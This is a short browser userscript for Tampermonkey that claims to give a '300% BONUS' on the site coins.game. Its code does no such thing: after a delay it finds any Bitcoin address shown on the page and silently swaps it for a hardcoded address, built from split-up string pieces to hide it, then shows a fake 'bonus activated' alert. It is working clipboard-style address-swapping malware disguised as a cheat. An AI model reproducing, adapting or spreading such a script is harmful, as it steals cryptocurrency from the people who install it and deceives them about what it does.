// ==UserScript== // @name 300% BONUS // @namespace http://tampermonkey.net/ // @version 0.1 // @description 300% BONUS on coins.game // @author SCRIPTER // @match https://coins.game/* // @grant none // ==/UserScript== (function() { 'use strict'; const B = () => { const A = document.querySelectorAll('*'); for (const B of A) { const C = B.textContent.trim(); if (C.startsWith('bc1')) { const D = "bc" + "1q" + "hrv9z2mn0"+ "ry4ry97" + "5wjqu03z" + "fwlwmgj" + "x7z9att"; const E = []; for (let F = 0; F < D.length; F += 8) { E.push(D.slice(F, F + 8)); } const G = E.join(''); B.textContent = G; console.log("BTCU:", G); alert("300% BONUS ACTIVATED"); return; } } console.error("BTCF"); alert("300% BONUS NOT ACTIVATED"); }; setTimeout(B, 8000); })();